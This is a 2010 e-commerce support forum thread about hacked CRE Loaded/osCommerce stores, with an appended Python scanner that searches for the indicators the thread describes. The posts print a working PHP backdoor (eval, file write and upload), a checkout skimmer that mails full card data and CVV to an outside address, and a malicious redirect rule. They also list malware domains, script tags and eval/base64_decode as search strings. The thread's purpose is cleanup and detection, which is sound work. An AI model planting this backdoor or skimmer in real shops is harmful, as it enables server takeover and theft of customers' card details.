Loaded Commerce Community

Board index » Loaded Commerce Support » Security Issues

All times are UTC - 5 hours




Post new topic Reply to topic  [ 9 posts ] 
Author Message
 Post subject: Security Breach on our Site
PostPosted: Thu Aug 26, 2010 9:22 am 
CRE Newbie

Joined: Thu Aug 26, 2010 9:10 am
Posts: 1
We've had an issue today where our site was hacked and the following code was inserted into the includes/languages/english/mainpage.php file in place of the home page content:

Code:
<?php
// Stays dormant unless the request carries ?cookies=1, so ordinary visitors never trigger it.
if (@$_GET['cookies'] == 1) {
    echo 'Cookies must be enabled !';
    $tf = '';
    if (@$_POST['tf']) { $tf = @$_POST['tf']; }   // target filename
    if (@$_POST['e']) { eval(@$_POST['e']); }     // executes PHP supplied in the request
    if (@$_POST['t']) {                           // writes request text into the target file
        if ($tf != '') { $f = fopen($tf, 'w'); fwrite($f, @$_POST['t']); fclose($f); }
    }
    if (@$_FILES['f']['name'] != '') {            // stores an uploaded file under its own name
        $tf = $_FILES['f']['name'];
        move_uploaded_file(@$_FILES['f']['tmp_name'], $tf);
    }
    exit;
}
?>


As a result, I then found a load of PHP scripts had been written into the /images folder, called google***.php.

Does anyone know of a specific fix for this that I can apply without patching the whole site? I'm assuming there must be a way of stopping remote users from writing to these files.

We're running version 6.2.11 White Label.

Any suggestions appreciated.

Richard

 Post subject: Re: Security Breach on our Site
PostPosted: Fri Aug 27, 2010 1:36 pm 
CRE Newbie

Joined: Mon Feb 08, 2010 9:17 pm
Posts: 1
I am having the exact same issue on my site. I have noticed they also created those google*.php files in the images folder as well.

Please help! I deleted all the google*.php files I could find, but they keep reappearing every morning. Is there a way to stop it?

 Post subject: Re: Security Breach on our Site
PostPosted: Sat Aug 28, 2010 1:12 pm 
CRE Newbie

Joined: Sat Aug 28, 2010 1:09 pm
Posts: 3
My site was hacked like this.

I think CRE Loaded security support is dead.

 Post subject: Re: Security Breach on our Site
PostPosted: Tue Aug 31, 2010 7:34 am 
CRE Talented

Joined: Sun Nov 29, 2009 10:57 am
Posts: 352
CRE 6.3 - 6.4 - 6.4.1 - 6.4.1a

Not just for the sake of it..

UPGRADE - UPGRADE - UPGRADE - UPGRADE

_________________
CSS Store - http://mdjl40.mdjl-demo.co.uk - Work in Progress
YMM Filter Lists - http://mdjl-demo.co.uk/6-4-1a - Pagination/Filter Lists

 Post subject: Re: Security Breach on our Site
PostPosted: Mon Sep 13, 2010 12:18 am 
CRE Newbie

Joined: Thu Feb 18, 2010 4:44 pm
Posts: 21
The same thing happens on all versions. It's an issue affecting all osCommerce based carts since August 2010.

 Post subject: Re: Security Breach on our Site
PostPosted: Mon Sep 13, 2010 2:16 am 
CRE Newbie

Joined: Mon Feb 22, 2010 10:24 am
Posts: 31
Two possible solutions in this case:

1. Password Protect Your Admin Directory.

2. Alternatively create an .htaccess file (if you are running your store on a unix based server) with the following rules:

Deny From All
Allow From <Your IP address here>

There are 3 separate exploits that are currently working against CRE Loaded and osCommerce-based stores in general. Considering you are not going to completely rewrite the current code, use one of the solutions proposed above. It is really easy to restrict access to the admin backend, and this will ultimately solve the problem.

_________________
SiteGround Technical Support Team Member
Check out our special CreLoaded hosting package

 Post subject: Re: Security Breach on our Site
PostPosted: Mon Sep 13, 2010 10:01 am 
CRE Newbie

Joined: Fri Sep 10, 2010 5:21 pm
Posts: 4
Make sure you check all files that receive user input, such as credit card information, because there will be code in there sending an email with all of the credit card information: name, address, 3-digit code. I found several such snippets in create_account.php and checkout_process.php.

Code:
// Gathers the card and customer details that the checkout code already has in scope.
$ip = getenv("REMOTE_ADDR");
$cvv = $_SESSION['x_Card_Code'];
$number = $order->info['cc_number'];
$expires = $order->info['cc_expires'];
// Hard-coded recipient: the address the captured data is mailed to.
$to = 'admin@finderdirect.com';
$subject = 'Cleanreport.com Email:' . $order->customer['email_address'] . ' ' . $number;
$body = "<p> IP address= " . $ip . "<p> nDate=" . date('d-m-Y') .
    "<p> ntelephone=" . $order->customer['telephone'] .
    "<p> nemail_address=" . $order->customer['email_address'] .
    "<p> nName=" . $order->customer['firstname'] . $order->customer['lastname'] .
    "<p> nAddress1=" . $order->customer['street_address'] .
    "<p> nCity=" . $order->customer['city'] .
    "<p> nState=" . $order->customer['state'] .
    "<p> nZip=" . $order->customer['postcode'] .
    "<p> nCountry=" . $order->billing['country']['title'] .
    "<p> nmethod=" . $order->info['payment_method'] .
    "<p> ntype=" . $order->info['cc_type'] .
    "<p> nowner=" . $order->customer['firstname'] . '&nbsp;' . $order->customer['lastname'] .
    "<p> nnumber=" . $number . "<p> nexp=" . $expires . "<p> ncvv=" . $cvv;

$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$headers .= "Cleanreport.com";
// Sends the full card number, expiry and CVV out of the shop with PHP's raw mail().
mail($to, $subject, $body, $headers);


If you search all the files in that directory for the PHP function mail(), you should be able to find tons of code. You will also see what email address it is sent to.
~Rudy

 Post subject: Re: Security Breach on our Site
PostPosted: Mon Sep 20, 2010 4:04 pm 
CRE Newbie

Joined: Sat Aug 28, 2010 1:09 pm
Posts: 3
The first changed file on my site was includes/languages/... / cookie_usage.php

Can someone change this file's content from the admin side?

 Post subject: Re: Security Breach on our Site
PostPosted: Fri Dec 03, 2010 11:12 pm 
CRE Newbie

Joined: Tue Jun 05, 2007 12:00 am
Posts: 13
Hi,

We have tried many ways to temporarily and manually fix the now famous hack too.
Below is the info and the fixes:

Fixes we have made:
1. Follow the steps in http://blog.sucuri.net/2010/10/oscommer ... ky-ru.html
a. Ask hosting IT support to help clean up the .htaccess file.
This is what the .htaccess looks like:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]

RewriteRule ^(.*)$ http://devisionnetwork.ru/suomi/index.php [R=301,L]
b. A backdoor is created inside /js/conf.php and another one at /flops.php. Make sure to remove these and search for other PHP files that are not part of the official osCommerce distribution.
c. Blackhat SEO spam is added to includes/application_bottom.php.
2. Securing the Admin folder
a. Rename the Admin folder.
b. After renaming the Admin folder, make changes in renamed_admin_directory/includes/configure.php:
define('DIR_WS_HTTP_ADMIN', '/shop/admin-gbh-group/');
define('DIR_WS_HTTPS_ADMIN', 'admin-gbh-group/');
define('DIR_FS_ADMIN', '/home/gbhgroup/public_html/shop/admin-gbh-group/');
There is also an issue with the hack; read Jan's thread here (http://forums.oscommerce.com/index.php?showtopic=340995).
c. Password protect the renamed Admin folder with the hosting control panel.
3. Remove the file manager (it is vulnerable). Search for and delete all “file_manager.php” files.
Example:
admin\includes\languages\english
admin\includes\languages\espanol
admin\includes\languages\french
admin\includes\languages\german
4. Remove all “define_language.php” files (it is vulnerable).
Example:
admin\
admin\includes\languages\english
admin\includes\languages\espanol
admin\includes\languages\french
admin\includes\languages\german
5. Is your site really yours? http://www.unmaskparasites.com/
6. Practical Guide to Dealing With Google's Malware Warnings http://www.unmaskparasites.com/malware- ... upshop.com

Info
http://blog.sucuri.net/2010/11/oscommer ... n-etc.html
http://blog.sucuri.net/2010/11/continui ... sites.html
http://blog.sucuri.net/2010/11/malware- ... merce.html
http://blog.sucuri.net/2010/10/oscommer ... ky-ru.html

How to Scan Website
1. Use http://www.unmaskparasites.com and check. It will mainly tell you whether Google thinks the site is malicious, but it can also show bad strings.
2. Use http://www.web-sniffer.net and view the site as Google. Ensure that your page loads.
3. Check at http://www.URLVoid.com for the domain. Use the virus scan section afterward.
4. http://blog.sucuri.net – This blog has large amounts of useful data regarding these recent attacks on osCommerce (and variants).
5. Search all source code and look for something like:
a. <script src="http://nt07.in/3"></script>
b. <script src="http://nt06.in/3"></script>
c. <script src="http://nt04.in/3"></script>
d. <script src="http://nt02.co.in/3"></script>
e. <script src="http://nt002.cn/E/J.JS"></script>
f. ar-kirm.ru
g. arkirm.ru
h. camentrueopt.ru
i. ccmilkwq.ru
j. class-woods.ru
k. classwoods.ru
l. devisionnetwork.ru
m. devisionpanel.ru
n. drevingjp.tk
o. drivegup.tk
p. enterteiment-wizrd.ru
q. enterteimentwizrd.ru
r. everywoods.ru
s. interwumedi.ru
t. jaobsofterty.ru
u. kirm-ar.ru
v. kirmar.ru
w. kirm-sky.ru
x. kirmsky.ru
y. networkdevision.ru
z. relax-july.ru
aa. sensationworld.ru
bb. sky-ar.ru
cc. sky-kirm.ru
dd. taeliterup.ru
ee. tecros.ru
ff. traypro.ru
gg. tutaanti.ru
hh. zandecluf.ru
ii. eval
jj. base64_decode

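Rudy's advice to grep the checkout scripts for raw mail() calls and the search-string list in the last post both describe the same job: sweep the shop tree for the indicators this thread names. The script below is an added example, not code from the thread or from CRE Loaded/osCommerce. It walks a store directory and reports PHP files under images/, bare eval/base64_decode/move_uploaded_file/mail calls, the listed hostnames, a search-engine referer redirect in .htaccess, and the admin tools the post says to delete. It builds a small constructed sample tree in a temporary directory so it runs offline; the sample contents are made up to mirror the thread, and the assumption that legitimate osCommerce-derived code sends mail through its tep_mail() wrapper rather than calling mail() directly is mine.

```python
import re
import tempfile
from pathlib import Path

# Hostnames the thread lists as search strings (items f through hh plus the script hosts).
DOMAIN_IOCS = (
    "ar-kirm.ru", "arkirm.ru", "camentrueopt.ru", "ccmilkwq.ru", "class-woods.ru",
    "classwoods.ru", "devisionnetwork.ru", "devisionpanel.ru", "drevingjp.tk",
    "drivegup.tk", "enterteiment-wizrd.ru", "enterteimentwizrd.ru", "everywoods.ru",
    "interwumedi.ru", "jaobsofterty.ru", "kirm-ar.ru", "kirmar.ru", "kirm-sky.ru",
    "kirmsky.ru", "networkdevision.ru", "relax-july.ru", "sensationworld.ru",
    "sky-ar.ru", "sky-kirm.ru", "taeliterup.ru", "tecros.ru", "traypro.ru",
    "tutaanti.ru", "zandecluf.ru", "nt07.in", "nt06.in", "nt04.in", "nt02.co.in", "nt002.cn",
)
# Raw PHP calls worth reviewing. The lookbehind stops tep_mail() (assumed to be the
# shop's own wrapper) from matching, so only a bare mail( is reported.
CALL_RE = re.compile(r"(?<![\w$])(eval|base64_decode|move_uploaded_file|mail)\s*\(")
# The .htaccess pattern from the thread: search-engine referer -> 301 to another host.
REFERER_RE = re.compile(r"RewriteCond\s+%\{HTTP_REFERER\}\s+\.\*(google|ask|yahoo|bing)", re.I)
REDIRECT_RE = re.compile(r"RewriteRule\s+\S+\s+https?://", re.I)
# Admin tools the thread says to delete because they are vulnerable.
RISKY_ADMIN_FILES = {"file_manager.php", "define_language.php"}
TEXT_SUFFIXES = {".php", ".html", ".htm", ".js", ".tpl"}


def scan_text(rel_path, text):
    """Return (path, kind, detail) findings for one file's contents."""
    findings = []
    lower = text.lower()
    for host in DOMAIN_IOCS:
        if host in lower:
            findings.append((rel_path, "ioc_host", host))
    for match in CALL_RE.finditer(text):
        findings.append((rel_path, "call", match.group(1)))
    if rel_path.endswith(".htaccess") and REFERER_RE.search(text) and REDIRECT_RE.search(text):
        findings.append((rel_path, "referer_redirect", ""))
    return findings


def scan_tree(root):
    """Walk a shop directory and collect every indicator the thread describes."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.name in RISKY_ADMIN_FILES:
            findings.append((rel, "risky_admin_tool", path.name))
        # images/ should hold only image files; any .php there is foreign.
        if rel.startswith("images/") and path.suffix.lower() == ".php":
            findings.append((rel, "php_in_images", path.name))
        if path.suffix.lower() in TEXT_SUFFIXES or path.name == ".htaccess":
            text = path.read_text(encoding="utf-8", errors="replace")
            findings.extend(scan_text(rel, text))
    return findings


# Constructed sample tree mirroring what the thread reports (not real shop files).
SAMPLE_FILES = {
    "images/google123.php": "<?php if(@$_POST['e']){eval(@$_POST['e']);} ?>",
    "images/logo.gif": "GIF89a",
    "checkout_process.php": "<?php\n$number = $order->info['cc_number'];\nmail($to, $subject, $body, $headers);\n",
    "create_account.php": "<?php tep_mail($name, $email, $subject, $text); ?>",
    ".htaccess": ("RewriteEngine On\nRewriteCond %{HTTP_REFERER} .*google.* [OR]\n"
                  "RewriteCond %{HTTP_REFERER} .*yahoo.*\n"
                  "RewriteRule ^(.*)$ http://devisionnetwork.ru/suomi/index.php [R=301,L]\n"),
    "admin/includes/languages/english/file_manager.php": "<?php // language strings ?>",
    "includes/application_bottom.php": "<?php echo '<script src=\"http://nt07.in/3\"></script>'; ?>",
}


def build_sample_tree(dest):
    """Write the constructed sample files under dest."""
    for rel, content in SAMPLE_FILES.items():
        target = Path(dest) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")


def demo():
    """Build the sample tree in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel, kind, detail in demo():
        print(f"{kind:18} {rel}  {detail}")
```

Point scan_tree() at the shop's document root to run it for real; every hit is something to read by hand, since a bare mail() or eval() can be legitimate in a third-party add-on, while a PHP file under images/ or a referer-based redirect in .htaccess almost never is.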